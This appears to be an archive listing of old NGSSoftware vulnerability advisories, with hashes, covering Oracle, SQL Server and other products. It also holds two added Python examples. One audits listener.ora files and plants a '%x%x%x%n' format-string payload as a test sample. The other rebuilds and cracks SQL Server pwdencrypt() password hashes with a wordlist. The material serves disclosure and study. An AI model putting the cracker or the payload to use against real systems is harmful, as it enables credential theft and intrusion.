NGSSoftware Insight Security Research Advisory #NISR03022004 - Adobe Acrobat Reader version 5.1 is susceptible to a buffer overflow when an xfdf file is parsed and an unsafe call to sprintf is made.
5c2fe87f3086d81cece64a96a65a42cdbe85f107673aa6bbea41d68b9a187dfe
NGSSoftware Insight Security Research Advisory #NISR05112003 - Multiple Oracle Application Server SQL injection vulnerabilities exist for all OS platforms with Oracle 9i Application Server Release 1 and 2 and RDBMS.
c14bf67a31522701aa71637b6fe672b5b213d2b13fe5d981c029e99e1d4ae4cf
Thorough paper discussing how to defeat the stack based buffer overflow prevention mechanism in Microsoft Windows 2003 Server.
b38cd24d571d9497d31fa51821bf46da5ded71c3cc615f565477fda2effa5f09
NGSSoftware Insight Security Research Advisory #NISR25072003 - In an attempt to fix previous vulnerabilities discovered by NGSSoftware, the Oracle RDBMS fix patched the hole but left a logging function vulnerable to a stack overflow.
237dd712fc93400a7d9eed9e111f3ab5238fd5fcb2322857fa12ec0d69be3187
NGSSoftware Insight Security Research Advisory #NISR07052003B - SLWebMail 3 is vulnerable to various buffer overflows in many of its ISAPI DLL applications, including showlogin.dll, recman.dll, admin.dll, and globallogin.dll. It is also vulnerable to arbitrary file access via ShowGodLog.dll, which does not require authentication before use. Physical paths can also be disclosed by making invalid requests to certain DLLs.
54067ee210fce9b8f593df9b701aad1f9b7f8d14e93cc22925ce3b332df7bdb6
NGSSoftware Insight Security Research Advisory #NISR07052003A - SLMail 5.1.0.4420 suffers from multiple remotely exploitable buffer overflows in its SMTP engine, poppasswd and pop3 server.
f1596ac171952997d68b570e48c7d33e603793b70bb773d5a05f225bd2eec995
NGSSoftware Insight Security Research Advisory #NISR29042003 - A classic stack based buffer overflow vulnerability exists in the Oracle database server that can be triggered by providing an overly long parameter in the connect string of a 'CREATE DATABASE LINK' query.
c3f8b0302120eee28deb89f9e37d6fc46825608d07e31b5127eebc4b72b60651
Whitepaper called Hackproofing Lotus Domino Web Server.
e72c2b8f13fb6814be70f4f3f1c13a46b474daf15badd237d92bab4ce9ce1bbd
MSSQL Server 2000 SP0 - SP2 remote exploit which uses UDP to overflow a buffer and send a shell to tcp port 53. Windows binary, C++ source code here.
d6907914ee2d6127262ab91de8878fe5f9b1afe9e8cda7d6345fd2c14feeb2fe
MSSQL Server 2000 SP0 - SP2 remote exploit which uses UDP to overflow a buffer and send a shell to tcp port 53.
7044113295ae8d7257c9af9f64073d4d2e4576635263c471c511b95c4f6eb551
The Oracle iSQL*Plus 9i R1 and R2 web based application has an authentication buffer overflow on all operating systems in the User ID parameter which allows remote attackers to execute arbitrary code as the oracle user on Unix and as SYSTEM on Windows. Patch available here.
1721781c18414d0033b5c54cab225544447998747b4d67107efcbc20286bb7b9
NGSSoftware Security Advisory - Microsoft SQL Server 2000 and 7 allow attackers to gain control of the database by elevating their privileges by using the xp_runwebtask stored procedure. Fix available here.
0993da5c8ab7c5ff24d06d11c71e7c6166e5eef4f669d081f8f47da07b21ae30
NGSSoftware Security Research Advisory NISR03092002 - The sp_MSSetServerProperties stored procedure in Microsoft SQL Server 2000 contains a low risk issue which allows remote users to decide whether or not SQL Server starts up automatically. This does not allow an attacker to compromise the server or data but may be used in conjunction with another attack.
2d8b8761c587c92d162bdf1ffcb36e42ec190e63cc9a5e3406c3b2a332cc6519
NGSSoftware Security Research Advisory NISR03092002B - The Microsoft Windows .NET Server Release Candidate contains a buffer overflow in name resolution which allows an attacker without a user ID or password to take control of the server with a single packet to UDP port 1434 on a machine running MSDE. Fix available here.
9db34630d664597a8cf29192735e45564c2d9e401bac5a6b0d4ed6fab67a82c6
NGSSoftware Security Research Advisory NISR25072002 - Microsoft's database server SQL Server 2000 exhibits two buffer overrun vulnerabilities that can be exploited by a remote attacker without ever having to authenticate to the server. What further exacerbates these issues is that the attack is channeled over UDP port 1434. Whether the SQL Server process runs in the security context of a domain user or the local SYSTEM account, successful exploitation of these security holes will mean a total compromise of the target server and its data.
7374876a71fb3fcb12a28e6f8cfb96087512b03f0bc58422af03eaa003fa9944
NGSSoftware Security Advisory NISR22002002A - Microsoft SQL Server 2000 SP 2 allows unprivileged users to insert and run arbitrary commands because a public stored procedure fails to validate user input before passing it to xp_cmdshell. Fix available here.
ec956303773437c9c86299281915cc489c31d1aba9eef2f1ee381b8c865bfd6d
NGSSoftware Security Advisory NISR19002002A - Microsoft SQL Server 2000 and 7 come with a "helper" service which allows a low privileged user to create and overwrite arbitrary files on the SQL server. Includes proof of concept SQL code.
d00fd77d758ad8f157ea1a193c0b5f00842cddd2ba606d82b82ca8b386411279
NGSSoftware Security Advisory - Microsoft SQL Server 2000 and 7's helper service allows an attacker to submit jobs to the SQL Agent to be executed with elevated privileges. Proof of concept sql code included. This vulnerability is discussed in ms02-042.
9bf0a97cb7b8ed59e9098bf029a62f468d0bfbd94895eae5891363aff1545a15
Oracle provides a tool called the Listener Control utility (lsnrctl) to allow an Oracle DBA to remotely control the Listener, the process responsible for handling client requests for database services. This control utility contains an indirect, remotely exploitable format string vulnerability. By default the Oracle Listener is not protected against unauthenticated access and control, so the configuration file of a Listener in that state can be modified without the user needing to supply a password. By inserting a format string into certain entries of the listener.ora file, an attacker can gain control of a Listener Control utility that later reads that file.
670c33c99fb1077f6adc54c6ef7f9e82ca3f1c4fcc69fdf1ecde9e16b02514fa
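The advisory above describes two conditions that combine: a Listener whose configuration can be rewritten without a password, and a control utility that passes configuration values to a formatting routine. The checker below is an added example (not code from the advisory or from Oracle) that parses the parenthesised listener.ora syntax and reports both conditions: listeners with no PASSWORDS_<name> entry or with ADMIN_RESTRICTIONS_<name> not set to ON, and any value containing a printf-style conversion sequence. The parameter names PASSWORDS_<name> and ADMIN_RESTRICTIONS_<name> are the standard Oracle Net parameters; the two sample files are constructed for this example, and the planted `%x%x%x%n` value is only there to be detected.

```python
import re

# Conversion sequences a C formatting routine would act on (%% is excluded).
FORMAT_SPEC = re.compile(r"%[-+ #0]*\d*(?:\.\d+)?[diouxXeEfgGcspn]")
LISTENER_KEYS = {"DESCRIPTION_LIST", "DESCRIPTION", "ADDRESS_LIST", "ADDRESS"}


def tokenize(text):
    """Split listener.ora text into '(', ')', '=' and bare-word tokens; '#' starts a comment."""
    tokens, i, n = [], 0, len(text)
    while i < n:
        c = text[i]
        if c.isspace():
            i += 1
        elif c == "#":
            while i < n and text[i] != "\n":
                i += 1
        elif c in "()=":
            tokens.append(c)
            i += 1
        else:
            j = i
            while j < n and text[j] not in "()=#\n":
                j += 1
            tokens.append(text[i:j].strip())
            i = j
    return tokens


def parse_ora(text):
    """Parse into a list of (key, value) pairs; value is a str or a nested list of pairs."""
    toks, pos = tokenize(text), 0

    def parse_value():
        nonlocal pos
        if pos >= len(toks):
            raise ValueError("unexpected end of file")
        if toks[pos] != "(":
            pos += 1
            return toks[pos - 1]
        groups = []
        while pos < len(toks) and toks[pos] == "(":
            pos += 1
            key = toks[pos]
            pos += 1
            if pos < len(toks) and toks[pos] == "=":
                pos += 1
                groups.append((key, parse_value()))
            else:
                groups.append((None, key))      # bare value such as (password)
            if pos >= len(toks) or toks[pos] != ")":
                raise ValueError("expected ')'")
            pos += 1
        return groups

    entries = []
    while pos < len(toks):
        key = toks[pos]
        pos += 1
        if pos >= len(toks) or toks[pos] != "=":
            raise ValueError(f"expected '=' after {key!r}")
        pos += 1
        entries.append((key, parse_value()))
    return entries


def walk(entries, prefix=""):
    """Yield (path, value) for every string leaf in the parsed tree."""
    for key, value in entries:
        path = f"{prefix}/{key}" if key is not None else prefix
        if isinstance(value, list):
            yield from walk(value, path)
        else:
            yield path, value


def audit(entries):
    """Return human-readable findings for unauthenticated listeners and planted format strings."""
    findings, top = [], dict(entries)
    listeners = [k for k, v in entries
                 if isinstance(v, list) and any(sub in LISTENER_KEYS for sub, _ in v)]
    for name in listeners:
        if f"PASSWORDS_{name}" not in top:
            findings.append(f"{name}: no PASSWORDS_{name} set; lsnrctl can reconfigure it without a password")
        if str(top.get(f"ADMIN_RESTRICTIONS_{name}", "OFF")).upper() != "ON":
            findings.append(f"{name}: ADMIN_RESTRICTIONS_{name} is not ON; remote SET commands can rewrite listener.ora")
    for path, value in walk(entries):
        if FORMAT_SPEC.search(value):
            findings.append(f"{path}: value {value!r} contains printf-style conversion(s)")
    return findings


# Constructed sample: default-style listener with a format string planted in a file-name entry.
SAMPLE_WEAK = """
# constructed listener.ora for this example, not a real site's file
LISTENER =
  (DESCRIPTION_LIST =
    (DESCRIPTION =
      (ADDRESS = (PROTOCOL = TCP)(HOST = dbhost)(PORT = 1521))
    )
  )
SID_LIST_LISTENER =
  (SID_LIST =
    (SID_DESC =
      (SID_NAME = ORCL)
      (ORACLE_HOME = /u01/app/oracle/product/9.2.0)
    )
  )
TRACE_FILE_LISTENER = listener%x%x%x%n
"""

# Constructed hardened counterpart: password set, SET restricted, no conversion sequences.
SAMPLE_HARDENED = """
LISTENER =
  (DESCRIPTION_LIST =
    (DESCRIPTION =
      (ADDRESS = (PROTOCOL = TCP)(HOST = dbhost)(PORT = 1521))
    )
  )
PASSWORDS_LISTENER = (placeholderhashvalue)
ADMIN_RESTRICTIONS_LISTENER = ON
TRACE_FILE_LISTENER = listener.trc
"""

if __name__ == "__main__":
    for label, text in (("weak", SAMPLE_WEAK), ("hardened", SAMPLE_HARDENED)):
        print(f"== {label} ==")
        for finding in audit(parse_ora(text)) or ["no findings"]:
            print("  " + finding)
```

The parser keeps repeated keys as separate pairs rather than collapsing them into a dictionary, so a second ADDRESS or SID_DESC entry is still walked and checked. Values containing spaces or commas are read as a single bare token up to the next delimiter, which is enough for paths and password lists but not for quoted strings.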
Information on cracking the Microsoft SQL pwdencrypt() hash function which is used to generate SQL hashes.
5c2b4319be1979dcbd27e7fd3420df3b66d393c7fcb09d4c8682d6c6694cd701
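The entry above points at research on the SQL Server 2000 pwdencrypt() hash. The code below is an added example, not from that paper, that reproduces the documented layout of that hash (a 0x0100 version marker, a 4-byte salt, then SHA-1 of the UTF-16LE password followed by the salt, then SHA-1 of the upper-cased password followed by the salt) and shows why the second digest makes cracking cheap: a candidate is first matched case-insensitively against the upper-case digest, and only the handful of case variants of the one matching word are then tried against the case-sensitive digest. The wordlist and passwords are constructed for the example, and the upper-casing is plain Python `str.upper()`, which matches the server's behaviour for ASCII only.

```python
import hashlib
import itertools
import os

VERSION = b"\x01\x00"          # leading 0x0100 as stored in sysxlogins.password
HASH_LEN = 2 + 4 + 20 + 20     # version, salt, case-sensitive SHA-1, upper-case SHA-1


def _sha1_salted(password, salt):
    """SHA-1 over the UTF-16LE password with the 4-byte salt appended."""
    return hashlib.sha1(password.encode("utf-16-le") + salt).digest()


def pwdencrypt(password, salt=None):
    """Build a pwdencrypt()-style blob: 0x0100 | salt | sha1(pw+salt) | sha1(UPPER(pw)+salt)."""
    salt = os.urandom(4) if salt is None else salt
    if len(salt) != 4:
        raise ValueError("salt must be 4 bytes")
    return VERSION + salt + _sha1_salted(password, salt) + _sha1_salted(password.upper(), salt)


def parse_hash(blob):
    """Split a blob into (salt, case_sensitive_digest, upper_case_digest)."""
    if len(blob) != HASH_LEN or blob[:2] != VERSION:
        raise ValueError("not a SQL Server 2000 pwdencrypt() hash")
    return blob[2:6], blob[6:26], blob[26:46]


def case_variants(word):
    """Every upper/lower casing of the letters in word, non-letters left alone."""
    slots = [(c.lower(), c.upper()) if c.isalpha() else (c,) for c in word]
    for combo in itertools.product(*slots):
        yield "".join(combo)


def crack(blob, wordlist):
    """Two-stage attack: case-insensitive match first, then recover the exact case."""
    salt, h_case, h_upper = parse_hash(blob)
    for word in wordlist:
        upper = word.upper()
        if _sha1_salted(upper, salt) != h_upper:
            continue                           # one SHA-1 per wordlist entry
        for candidate in case_variants(upper):  # at most 2**letters extra SHA-1s
            if _sha1_salted(candidate, salt) == h_case:
                return candidate
        return upper                            # upper-case digest matched but case not recovered
    return None


def attempts_without_shortcut(word):
    """How many SHA-1s a pure case-sensitive search over all casings of word would need."""
    return 2 ** sum(1 for c in word if c.isalpha())


if __name__ == "__main__":
    # Constructed example: the salt is fixed so the output is reproducible.
    blob = pwdencrypt("S3cret!Pw", salt=b"\x01\x02\x03\x04")
    print("0x" + blob.hex().upper())
    print("recovered:", crack(blob, ["welcome", "s3cret!pw", "oracle"]))
    print("casings of that word:", attempts_without_shortcut("S3cret!Pw"))
```

The stage-one comparison costs one SHA-1 per wordlist entry regardless of the password's casing, which is the property the research describes; a hash format that stored only the case-sensitive digest would force the attacker to pay the `case_variants` cost for every wordlist entry rather than for the single matching one.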
The Sun iPlanet Web Server iWS 4.1 and 6.0 contains a remotely exploitable buffer overflow if the search feature is enabled.
569fc6dbae95b454b1cb7139d2f9325513c3521f10923c0642d0afb59f288e67
The Oracle 9iAS Reports Server contains a remotely exploitable buffer overrun vulnerability in one of its CGIs. By supplying an overly long database name parameter to rwcgi60 with the setauth method, an attacker can run code with the privileges of the web server, or as SYSTEM on Windows.
36a7f0df817729ef91da8556ccad29083ab8e3a5fd0b1f644b31ce787342fffa
The Oracle TNS Listener version 9i contains a buffer overflow vulnerability which can be exploited over TCP port 1521 to gain remote SYSTEM or root access. By supplying an overly long SERVICE_NAME parameter an attacker can execute code before any logging is done.
09848a3033d275f59cf4d5ef91914e928a9a4fc43a64f46b30fa0e2a771e35d4
Macromedia JRun v3.1 for IIS 4/5 on WinNT 4/Win2K contains a buffer overflow which allows remote code execution as the local SYSTEM account.
2bd79d12f83316af1256e8abf3f82e65b0e812edc901f4c331319be81254b1ee
This document describes buffer overrun vulnerabilities on Sun Microsystems SPARC machines. We will begin by examining the SPARC architecture, looking at the registers and the stack. We will then go on to see exactly how buffer overrun vulnerabilities occur and how control over the process's execution is gained under SPARC, and then detail how, from there, the vulnerability can be exploited to gain control over the computer by looking at exploit code that spawns a shell under Solaris.
ea2827088b20a431d2ee4be68183cd2ee8cf525ff70d198af4b747cffecabe5c